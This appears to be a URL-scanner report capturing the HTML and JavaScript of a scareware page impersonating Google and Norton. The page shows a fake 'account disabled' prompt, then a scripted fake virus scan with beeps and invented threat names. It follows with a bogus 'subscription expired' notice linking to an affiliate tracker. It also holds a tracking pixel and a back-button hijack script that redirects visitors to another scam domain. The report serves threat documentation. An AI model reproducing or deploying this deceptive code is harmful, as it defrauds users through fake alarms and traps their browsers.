malware-stop.com
2606:4700:3036::ac43:d9b9
Public Scan
Submitted URL: http://koi-tika.jj7f.in/ga/click/2-235131196-20401-30245-59159-35934-a854d3267d-c946499aa4
Effective URL: https://malware-stop.com/UK-N-ANT-380-16112023/?u=14C380
Submission: On February 05 via api from US — Scanned from US
Form analysis
1 forms found in the DOM
Name: registerForm — POST
<form rel="noreferrer" action="" method="post" name="registerForm">
<img src="http://natureviewer.in/clicks?p=380P14C380&e=&s3=&s4=" class="hidden clickall" style="display: none;">
<div class="header">
<div class="container">
<div class="row">
<div class="col-sm-6 col-xs-6">
<img src="img/logo.png" class="logoto">
</div>
<div class="col-sm-6 col-xs-6">
<img src="img/tp.png" class="bggh">
</div>
</div>
</div>
</div>
<div class="middle-box" id="middle-box" style="display:none;">
<div class="container">
<div class="header-two">
<div class="row">
<div class="col-sm-6 col-xs-6">
<img src="img/logo.png" class="logo">
</div>
<div class="col-sm-6 col-xs-6">
<div class="smlicon">
<img src="img/icon1.png" class="newicon">
<img src="img/cross.png" class="crossicon">
</div>
</div>
</div>
<div class="seting">
<p><img src="img/setting.png" class="imgset"> Settings <span><img src="img/qs.png" class="imgset"> Help</span></p>
</div>
<div class="prt clearfix">
<div class="atrisk clearfix">
<div class="col-md-3 col-xs-3">
<img src="img/img2.png" class="fgtr">
</div>
<div class="col-sm-9 col-xs-9">
<div class="text-one">
<h4>You Are Protected</h4>
<ul>
<li>Protection Updates: <span class="tx-o">Current </span> </li>
<li>Last Scan: <span class="tx-tw">Not available | Quick Scan </span> </li>
<li>Licenses Used: <span class="tx-th">1 of 5 | | Install on Another Device </span> </li>
</ul>
</div>
</div>
</div>
</div>
<div class="descri clearfix">
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>Security</h4>
<img src="img/img3.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>Identity</h4>
<img src="img/img4.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>Performance</h4>
<img src="img/img5.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>More Norton </h4>
<img src="img/img6.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
</div>
<div class="gray_line2">
<div class="ftr"><span> SUBSCRIPTION STATUS: </span><span class="bhfdf"> 30 days left </span></div>
</div>
</div>
<div class="header-three" id="header-three" style="display:none;">
<div class="haderindder">
<div class="row">
<div class="col-sm-6 col-xs-6">
<h4>Quick Scan</h4>
</div>
<div class="col-sm-6 col-xs-6">
<div class="smlicon">
<img src="img/icon1.png" class="newicon">
<img src="img/cross.png" class="crossicon">
</div>
</div>
</div>
</div>
<div class="red-scanning clearfix">
<div class="col-sm-3 col-xs-4">
<div class="wrking">
<p><img src="img/ring.png" class="nhvf"> Working</p>
</div>
</div>
<div class="col-sm-9 col-xs-8">
<div class="scn-cont">
<ul class="local-scan">
<h4>Results Summary</h4>
<li id="li-one">C:\Windows\System32\csrss.exe</li>
<li id="li-two" style="display: none;">C:\Windows\System32\sihost.exe</li>
<li id="li-three" style="display: none;">C:\Program Files\Windows Defender\MSASCuiL.exe</li>
<li id="li-four" style="display: none;">C:\Windows\System32\SgrmBroker.exe</li>
<li id="li-five" style="display: none;">C:\Windows\System32\DDFs</li>
<li id="li-six" style="display: none;">C:\Windows\System32\Recovery</li>
<li id="li-seven" style="display: none;">C:\Windows\System32\DriverState</li>
<li id="li-eight" style="display: none;">tempRoot\system32\DRIVERS\bowser.sys</li>
<li id="li-nine" style="display: none;">C:\Windows\System32\DDFs</li>
<li id="li-ten" style="display: none;">C:\Windows\System32\Recovery</li>
</ul>
</div>
</div>
</div>
<div class="scanning-number">
<div class="line-one">Results Summary</div>
<div class="line-one">[+] Total number of documents scanned: <span class="chng-num"><span class="total"></span></span></div>
<div class="line-one">[+] Total number of of images scanned: <span class="chng-num-img pachis">825</span></div>
<div class="line-one">[+] Total risk found: <span class="chng-num-risk five-num">5</span></div>
<div class="line-one">Total security risk which requires action: <span class="chng-num-risk five-num">5</span></div>
<div class="blankdiv"></div>
</div>
<div class="stop-pause-btn-box">
<img src="img/logo.png" class="mkbnjhg">
<button type="button" class="bnts-stop gray-color">Pause</button>
<button type="button" class="bnts-stop red-color">Stop</button>
</div>
</div>
<div class="last-header clearfix" id="last-header" style="display:none;">
<div class="haderilndder">
<div class="row">
<div class="col-sm-6 col-xs-6">
<img src="img/logo.png" class="lstlogo">
</div>
<div class="col-sm-6 col-xs-6">
<div class="smlicon">
<img src="img/icon1.png" class="newicon">
<img src="img/cross.png" class="crossicon">
</div>
</div>
</div>
</div>
<div class="total-virs">
<h4>Your system is infected with 5 viruses!</h4>
</div>
<div class="subbox">
<p>ACTION REQUIRED!</p>
<p>Your Norton AntiVirus Subscription Has Expired!</p>
<p>Renew now to keep your system protected.</p>
<p>If your system is unprotected, it is at risk for viruses and other malware.</p>
<div class="lastbtn">
<a href="https://www.swagtrk.com/B3M427L/6QQP66JK/?sub3=380P14C380" rel="noreferrer" class="hsjs"> Continue...
</a>
</div>
</div>
</div>
</div>
<div class="right-side-small-box">
<div class="div-one" id="one-sm-div" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Win32/Hoax.Renos.HX
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-two" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Trojan IRC/Backdor.Sd.FRV
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-three" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Adware.Win32.Look2me.ab
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-four" style="display: none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Trojan.Qoologic - Key Logger
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-five" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Trojan.Fakealert.356
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
</div>
</div>
<div class="newmacfee-add">
<div class="hgdeer">
<div class="logopat">
<img src="img/logo.png">
</div>
</div>
<div class="newmacfee-add fb-look">
<div class="blu-bar"></div>
<div id="message-page">
<div class="modal-content text-center" id="modal-content">
<div id="origahog" style="line-height: 1.6;">
<img class="ques-i" src="img/drive-i.png">
<span class="message">
<h2 style="font-size: 36px; font-weight:normal; margin: 10px 10px 20px 10px;">Account disabled</h2>
<p class="bhvgh">
<img class="user-i" src="img/acnt.png" alt=""><!-- aks@blueberrywebs.com -->
</p>
<p class="gap-all">
<span class="subhead" id="redtext"> Google accounts are usually disabled because <br> Google detects a policy violation. </span>
</p>
<!--<h4 style="font-size: 23px;margin: 0;color:#d300ff;"><span id="theTime">4 minutes and 44 seconds</span></h4>-->
<button type="button" class="att">RECOVER ACCOUNT NOW</button>
</span>
</div>
<!--<div class="prog-info">
<h3>98.7 GB of 100 GB used <img class="pull-right" style="height: 22px;" src="img/info-i.png"></h3>
<br />
<div class="progress" style="max-width: 100%">
<div class="progress-bar"
style="width: 18%; background:#3865c7;">18%
</div>
<div class="progress-bar" style="width: 15%; background:#c02816;">15%
</div>
<div class="progress-bar bg-danger progress-bar-stripped" style="width: 62%; background:#e1a724;">
65.7%
</div>
<div class="progress-bar progress-bar-stripped" style="width: 5%; background-color:#d4d4d4;">
1.3%
</div>
</div>
</div>-->
<!--<div class="mod-info">
<p><div class="bullet"></div> <span>Google Drive </span> <strong>18GB</strong></p>
<p><div class="bullet red"></div> <span>Gmail </span><strong>15GB</strong> </p>
<p><div class="bullet ylw"></div> <span>Google Photos </span><strong>65.7GB</strong></p>
</div>
</div>
</div>-->
<!-- <section class="text-center">
<h5> Are you <span></span>? </h5>
</section> -->
<!--<section>
<div class="wht-sec-foot">
<div class="row">
<div class="col">
<strong>English (US)</strong>
<br>
Français (France)
<br>
Português (Brasil)
<br>
Italiano
</div>
<div class="col">
Español
<br>
中文(简体)
<br>
Deutsch
<br>
+
</div>
</div>
</div>
</section> -->
</div>
<div style="width: 100%;height: 30px;"></div>
</div>
<script>
$(document).ready(function() {
$("button.att").click(function() {
$(".newmacfee-add").hide();
$(".middle-box").show();
});
});
</script>
<script>
$(document).ready(function() {
$("button.att").click(function() {
setTimeout(function() {
document.getElementById("middle-box").style.display = "block";
}, 2000);
setTimeout(function() {
document.getElementById("header-three").style.display = "block";
}, 2000);
setTimeout(function() {
document.getElementById("last-header").style.display = "block";
}, 13000);
/* Right side small box code stert*/
setTimeout(function() {
$('#one-sm-div').addClass('highlight');
}, 3000);
setTimeout(function() {
$('#one-sm-div').removeClass('highlight');
}, 4000);
setTimeout(function() {
$('#one-sm-two').addClass('highlight');
}, 4000);
setTimeout(function() {
$('#one-sm-two').removeClass('highlight');
}, 6000);
setTimeout(function() {
$('#one-sm-three').addClass('highlight');
}, 6000);
setTimeout(function() {
$('#one-sm-three').removeClass('highlight');
}, 8000);
setTimeout(function() {
$('#one-sm-four').addClass('highlight');
}, 8000);
setTimeout(function() {
$('#one-sm-four').removeClass('highlight');
}, 10000);
setTimeout(function() {
$('#one-sm-five').addClass('highlight');
}, 10000);
setTimeout(function() {
$('#one-sm-five').removeClass('highlight');
}, 12000);
/* Right side small box code end*/
/* cdrive code working stert*/
setTimeout(function() {
document.getElementById("li-one").style.display = "block";
}, 2000);
setTimeout(function() {
document.getElementById("li-one").style.display = "none";
}, 3000);
setTimeout(function() {
document.getElementById("li-two").style.display = "block";
}, 3000);
setTimeout(function() {
document.getElementById("li-two").style.display = "none";
}, 4000);
setTimeout(function() {
document.getElementById("li-three").style.display = "block";
}, 4000);
setTimeout(function() {
document.getElementById("li-three").style.display = "none";
}, 5000);
setTimeout(function() {
document.getElementById("li-four").style.display = "block";
}, 5000);
setTimeout(function() {
document.getElementById("li-four").style.display = "none";
}, 6000);
setTimeout(function() {
document.getElementById("li-five").style.display = "block";
}, 6000);
setTimeout(function() {
document.getElementById("li-five").style.display = "none";
}, 7000);
setTimeout(function() {
document.getElementById("li-six").style.display = "block";
}, 7000);
setTimeout(function() {
document.getElementById("li-six").style.display = "none";
}, 8000);
setTimeout(function() {
document.getElementById("li-seven").style.display = "block";
}, 8000);
setTimeout(function() {
document.getElementById("li-seven").style.display = "none";
}, 9000);
setTimeout(function() {
document.getElementById("li-eight").style.display = "block";
}, 9000);
setTimeout(function() {
document.getElementById("li-eight").style.display = "none";
}, 10000);
setTimeout(function() {
document.getElementById("li-nine").style.display = "block";
}, 10000);
setTimeout(function() {
document.getElementById("li-eight").style.display = "none";
}, 11000);
setTimeout(function() {
document.getElementById("li-ten").style.display = "block";
}, 11000);
setTimeout(function() {
document.getElementById("li-ten").style.display = "none";
}, 11000);
/* cdrive code working end*/
/*Number code stert*/
$({
counter: 0
}).animate({
counter: 2022
}, {
duration: 10000,
easing: 'linear',
step: function() {
$('.total').text(Math.ceil(this.counter))
},
complete: function() {}
});
$({
counter: 0
}).animate({
counter: 825
}, {
duration: 10000,
easing: 'linear',
step: function() {
$('.pachis').text(Math.ceil(this.counter))
},
complete: function() {}
});
$({
counter: 0
}).animate({
counter: 5
}, {
duration: 10000,
easing: 'linear',
step: function() {
$('.five-num').text(Math.ceil(this.counter))
},
complete: function() {}
});
/*Number code End*/
/*BeeP Code start*/
audioCtx = new(window.AudioContext || window.webkitAudioContext)();
function beep() {
volume = 0.7;
duration = 500;
type = "square"; // "sine", "sawtooth", "triangle"
frequency = 900;
var oscillator = audioCtx.createOscillator();
var gainNode = audioCtx.createGain();
oscillator.connect(gainNode);
gainNode.connect(audioCtx.destination);
gainNode.gain.value = volume;
oscillator.frequency.value = frequency;
oscillator.type = type;
oscillator.start();
setTimeout(function() {
oscillator.stop();
}, duration);
};
var i = 1;
x = setInterval(function() {
beep();
i++;
if (i > 5) clearInterval(x);
}, 2000);
/*BeeP Code end*/
});
});
</script>
<script>
(function(window, location) {
var redirect = "https://royal.lo7y.in/WW-gHlL0x011/";
var currentUrl = location.origin + location.pathname + location.search;
if (location.hash !== "#!/hst") {
history.replaceState(null, document.title, currentUrl + "#!/hst");
history.pushState(null, document.title, currentUrl);
}
window.addEventListener("popstate", function() {
if (location.hash === "#!/hst") {
setTimeout(function() {
window.location.replace(redirect);
}, 0);
}
}, false);
}
(window, location));
</script>
</div>
</div>
</form>
Text Content
Settings Help YOU ARE PROTECTED * Protection Updates: Current * Last Scan: Not available | Quick Scan * Licenses Used: 1 of 5 | | Install on Another Device SECURITY Protected IDENTITY Protected PERFORMANCE Protected MORE NORTON Protected SUBSCRIPTION STATUS: 30 days left QUICK SCAN Working RESULTS SUMMARY * C:\Windows\System32\csrss.exe * C:\Windows\System32\sihost.exe * C:\Program Files\Windows Defender\MSASCuiL.exe * C:\Windows\System32\SgrmBroker.exe * C:\Windows\System32\DDFs * C:\Windows\System32\Recovery * C:\Windows\System32\DriverState * tempRoot\system32\DRIVERS\bowser.sys * C:\Windows\System32\DDFs * C:\Windows\System32\Recovery Results Summary [+] Total number of documents scanned: [+] Total number of of images scanned: 825 [+] Total risk found: 5 Total security risk which requires action: 5 Pause Stop YOUR SYSTEM IS INFECTED WITH 5 VIRUSES! ACTION REQUIRED! Your Norton AntiVirus Subscription Has Expired! Renew now to keep your system protected. If your system is unprotected, it is at risk for viruses and other malware. Continue... Threat detected! Win32/Hoax.Renos.HX High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Trojan IRC/Backdor.Sd.FRV High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Adware.Win32.Look2me.ab High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Trojan.Qoologic - Key Logger High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Trojan.Fakealert.356 High risk Origin Not available Activity Threat actions performed: 1 ACCOUNT DISABLED Google accounts are usually disabled because Google detects a policy violation. RECOVER ACCOUNT NOW